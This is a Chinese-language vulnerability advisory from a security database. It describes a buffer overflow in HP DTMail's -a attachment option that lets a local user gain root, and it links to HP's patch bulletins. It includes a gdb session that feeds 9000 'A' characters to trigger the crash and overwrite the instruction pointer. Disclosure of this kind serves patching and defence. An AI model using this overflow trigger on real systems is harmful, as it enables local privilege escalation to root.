HP DTMail附件参数缓冲区溢出漏洞

2006-10-25T00:00:00
ID SSV:121
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00

Description

HP DTMail是在桌面上使用的邮件客户端。

DTMail在处理-a选项参数时存在缓冲区溢出漏洞,本地攻击者可以利用此漏洞获得root用户权限。

以下gdb输出显示了这个漏洞:

gdb) r -a -a perl -e 'print "A" x 9000'
Starting program: /cluster/members/member0/tmp/dtmail -a perl -e 'print "A"x 9000'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140

HP dtmail 5.1b HP已经为此发布了安全公告(HPSBUX02162/HPSBTU02163)以及相应补丁:

HPSBUX02162:SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code 链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091

HPSBTU02163:SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code 链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793805